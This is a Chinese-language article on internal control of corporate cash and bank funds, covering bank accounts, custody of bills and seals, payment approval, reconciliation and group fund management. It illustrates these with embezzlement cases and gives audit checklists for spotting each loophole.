检方告诉记者,证据显示单位不知道刘国斌和周和生私设账户,两人将钱款拆借给其他公司并从中获利,至于获利多少,由于时间过于久远,目前已经难以调查,但是这些都不影响对两人贪污罪的定性。此案之所以多年没有案发,是因为刘、周一直掌控着账户,年底单位查账时,账目是平的,所以一直没有被发现。此后,两人已经不在计财科任职。在年底对账时,由于单位无人知道这些账户,所以没有相关人员到银行对账,银行打来询问电话,此事才暴露。
漏洞识别:检查公司银行开户和销户资料,是否齐全和经过适当授权批准;检查公司银行账户台账建立情况,台账信息是否完整,并核对公司银行账户台账与公司账务记录的银行存款明细科目进行核对,检查银行账户使用情况是否符合规定等。
货币资金六大内控漏洞之二
引言:货币资金是流动性最强、控制风险最高的资产,企事业单位的货币资金遭挪用、贪污和诈骗等案例可以说屡见报端,而这些案例的发生往往与单位货币资金存在内控漏洞直接相关。
典型漏洞三:货币资金相关票据、印鉴保管不善,使用情况缺乏必要记录和检查。
企业对于有价票据及空白单证如果疏于管理,就会被“有心之人”加以利用。票据印鉴保管常见漏洞:票据/印鉴使用未经恰当授权;使用情况缺乏登记留底;在空白纸张或单证上加盖印鉴;作废票据/印鉴未妥善处理;网银U盾及密码支付器保管不当。
针对上述漏洞,企业应严格票据日常保管,票据的使用和流转应留下书面记录,譬如建立支票使用登记簿,登记支票号码、开具时间、收款人、金额、领用人等信息。收到外单位交付的票据应留下交接记录,对作废票据应予以妥善处置,加盖作废印章。禁止在空白纸张或单证上加盖印鉴。票据/印鉴的交接要留下书面交接记录。
【案例】上市公司出纳挪用公款炒股案。湖南九芝堂公司出纳梁某,采取偷盖公司银行印鉴和法人章,使用作废的、没有登记的现金支票等方法,在近五年期间先后挪用3000多万元用于炒股。给单位造成损失1137.8万余元。长沙市中级法院以挪用公款罪和挪用资金罪,判处梁某17年徒刑。
漏洞识别:检查企业票据、印鉴是否存放保险柜,是否建立票据登记簿,检查票据登记簿登记内容是否齐全,检查作废票据保管情况,是否存在随意丢弃作废票据现象等。
典型漏洞四:货币资金支付审批程序不够合理。
企业货币资金支付的授权审批权限不合理或程序不清,也是很多企业常犯的毛病,资金支付审批漏洞有:未清晰设置支付权限;缺乏临时授权,导致岗位人员离岗时无法正常办理支付;资金支付相关审核/审批环节欠缺;资金支付审核审批先后顺序不合理;未建立签字人员样本表用于核对签字。
企业资金支付通常要包括以下环节:
1、支付申请。公司有关部门或个人用款时,应当提前向审批人提交货币资金
2、支付申请,注明款项的用途、金额、预算、支付方式等内容,并附有效经济合同或相关证明。
3、支付审批。审批人根据其职责、权限和相应程序对支付申请进行审批。对不符合规定的货币资金支付申请,审批人应当拒绝批准。
4、支付复核。复核人应当对批准后的货币资金支付申请进行复核,复核货币资金支付申请的批准范围、权限、程序是否正确,手续及相关单证是否齐备,金额计算是否准确,支付方式、支付单位是否妥当等。复核无误后,交由出纳人员办理支付手续。
5、办理支付。出纳人员应当根据复核无误的支付申请,按规定办理货币资金支付手续,及时登记现金和银行存款日记账。
但有些企业在办理资金支付前缺乏出纳以外的会计人员复核或记账,或是先办理支付然后会计进行复核或记账,这会导致对付款无法有效监督,因为此时出纳虽然不记账,但原始单据先到出纳手里付款,再由出纳传递给制单会计,出纳可能会通过压单、变造单据等手段来挪用或侵占货币资金,不能对出纳进行有效的监督;账务处理不及时,现金账实差异巨大;另外会计制单时款项已付出,经办人也已离开财务部,制单时发现问题难以更正或与经办人及时沟通,因此,在设计付款流程时应尽量避免这种先付款后复核或制单的现象
企业应明确审批人对货币资金业务的授权批准方式、权限、程序、责任和相关控制措施,规定经办人办理货币资金业务的职责范围和工作要求;审批人应当根据货币资金授权批准制度的规定,在授权范围内进行审批,不得超越审批权限;经办人应当在职责范围内,按照审批人的批准意见办理货币资金业务;对于审批人超越授权范围审批的货币资金业务,经办人员有权拒绝办理,并及时向审批人的上级授权部门报告。
【案例】某企业规定:为对货币资金开支实行严格的控制,在年度预算内的资金预算,5万元以下的开支由财务处长审批;5万元至20万元的开支由总会计师审批;20万元至50万元的开支由总会计师签署意见,总经理审批;50万元以上开支由董事会商讨决定。
某日,公司采购部门送来付款申请及相关凭证,要求按照采购合同约定用转账支票支付上月采购某种货物的货款6万元。
碰巧当日总会计师在外出差,负责预算内资金支付的出纳小李也因病请假,小李的个人名章和票据经财务处长同意由小王保管,但小王平时只负责日常零星开支和与银行对账,不经手支票开具事务。
因此财务处长答复采购处,暂时无法支付货款。但是采购部说按照采购合同,当日若无法付款,将支付供货方一定的违约金,而且会影响到正常供货,对生产和销售也将带来不利影响,要求财务务必解决付款问题,财务对此一筹莫展。
该案例是企业经常碰到的一个情形,出现该问题的症结是公司制度对临时授权和离岗人员工作交接缺乏明确规定,如果公司都对有明确规定,可由总会计师临时授权,同意先由财务处长代签,出差回来后再办理补签手续,小李职权暂由小王行使权,则可保证资金正常支
付。
漏洞识别:了解企业资金支付流程和审批权限,查看流程设计是否有效,权限设置是否清晰合理;抽查若干资金支付凭证,是否按照要求执行,支付涉及的各项表单要素填写是否齐全和合规;了解企业在人员离岗时如何处理支付要求。
货币资金六大内控漏洞之二
典型漏洞五:货币资金及票据核对、盘点机制缺失。
账账核对、账实核对是防范及发现货币资金舞弊的重要控制手段,企业应由负责账物保管和记录以外的人员进行定期和不定期的检查、核对。对有形实物资产(例如现金、票据等)要定期和不定期盘点程序来核实资产的存在性和完整性;对不具实物形态的资产(如活期银行存款、定期存单等)和负债(如贷款)则定期通过询问、函证和对账等方式验证查实。以银行函证为例,只要发生过业务的银行,都应进行函证,即使账面存款余额已为零,函证时不仅要询问存款余额,还要核实有无未入账贷款、有无为他人提供担保等现象。
资金核对及盘点方面漏洞有:未定期和银行对账或对账程序不完善;未对票据及库存现金进行定期盘点和不定期突击盘点;对账或盘点未留下书面记录;银行余额调节表存在超过一个月未达账项而不及时处理;执行银行对账或盘点职责与资金保管职责未有效分离等。
为此,企业应完善各类涉及资金的银行存款、现金、票据、有价单证、空白单证的对账或盘点,防范潜在风险,例如下面介绍的应收票据挪用案例就是因为企业一直未真正去进行应收票据账实核对,导致票据挪用长达六年之久而未被发现。
【案例】某大型企业每年资金往来达数十亿元,客户付款有不少采用银行承兑汇票方式。公司销售会计收取货款和审核销货提单,如客户支付承兑汇票,销售会计负责收取票据并在ERP系统里登记,更新客户往来账。同时,为票据安全考虑,公司承兑票据实物存放于主办银行的保管箱,会计每天将收到的银行承兑汇票放入信封,并在信封上写明票据详细情况,将信封加盖印鉴封装起来。银行工作人员每天上门收取封存的信封并登记签收。公司在使用收到的承兑汇票对外付款时,则从银行保管箱取回承兑汇票,加盖印鉴背书转让给其他单位或委托银行收款。
公司销售会计,在这一岗位工作时间久了,他从中窥探到了一些漏洞,便挪用承兑汇票,挪用手法具体可分两种:
第一种手法是滚动挪用公司的银行承兑汇票,通过皮包公司办理质押贷款,汇票快到期时则挪用新的汇票将其替换出来。由于开户银行是提供保管箱业务,每次将银行承兑汇票放在信封交给银行,银行工作人员并不核对信封里的汇票数量和金额,而是只以会计在密封后的信封上填写数字为准,钟某利用这一漏洞,将有的承兑汇票暗地里截留下来,但在交给银行的信封上却记录了该笔汇票,银行毫不知情,以为汇票如数装在信封里。截留下来的汇票钟某拿出来通过皮包公司办理质押贷款,由于公司资金周转量很大,账上始终有一大笔存量的银行承兑汇票,销售会计得以持续地占用公司的银行承兑汇票而不被发现。而公司无论是对账还是审计,都只是将公司账面数与银行提供的代保管汇票数核对,挪用公司汇票的行为就一直没有被发现。
第二种手法是将直接盗用银行承兑汇票,将被背书人空白的银行承兑汇票据占为己有。由于很多银行承兑汇票是由客户背书转让给XY化纤公司,但客户在背书时经常都并不填写被背书人名称,销售会计便将这类汇票拿到自己在外与人合伙开设的皮包公司入账,与此同
时,他在公司财务账上则做退票处理,在ERP系统入账后进行冲销。会计主管领导曾经发现ERP系统有大量汇票退回现象,并向销售会计询问原因,销售会计解释说是客户汇票不符合要求,所以退回去了。遗憾的是,领导轻信了他的解释,对这种异常退票现象没有深究下去,未能及早发现其舞弊行为。
按理说,如果公司能严格对账的话,销售会计冲减客户往来账的行为应该是能被发现的,但公司与客户对账时,对期末账面余额为借方的应收账款会主动核对,而对期末余额为贷方的预收账款,认为反正客户不欠自己的钱,并不去与客户核对往来账。公司账面一直有大量的预收账款,销售会计便利用公司制度的不完善,从中混水摸鱼,并得以长期掩盖自己舞弊行为而不被发现。
该销售会计在六年多时间,挪用票据5000多万元都未被发现,直到公司要将其调离该岗位,要求其进行工作交接,挪用票据行为才得以暴露,但已给企业造成无可挽回的损失了。
漏洞识别:检查企业银行余额调节表编制情况,是否所有银行账户都编制调节表,查看编制人、复核人是否签名,查看编制日期判断编制是否及时。查看库存现金、票据及空白单证等盘点记录,了解盘点周期和盘点方式,判断是否存在内控漏洞。
典型漏洞六:集团母公司未实现资金集中管控或下属分子公司资金管理失控。
对集团公司来说,资金管理除了本部公司资金管理,还涉及到如何对分子机构资金管控,对下属分子机构资金管理漏洞主要有:未能实现资金集中管理;未制定统一的资金政策;未编制集团资金计划或资金计划不合理;对分子机构资金情况缺乏有效监督。
无论是资金安全还是提高资金效益角度出发,集团应制定统一的资金管理政策,有条件的情形采用现金池、内部银行或其他方式实行资金集中管理,并加强分支机构资金计划管理,加强针对分支机构资金活动的事中监督及事后评价,加强针对分支机构资金管理的内部审计。关于集团资金集中管理,目前已有大量成功案例,这里就不详细介绍了。
漏洞识别:了解集团下属分支机构情况,对下属分支机构资金管理采取何种管理模式,集团是否制定了统一资金管理政策,对下属分支机构银行账户的开立及日常资金活动是否监控,是否编制资金计划和相关资金报表,检查资金计划执行情况。
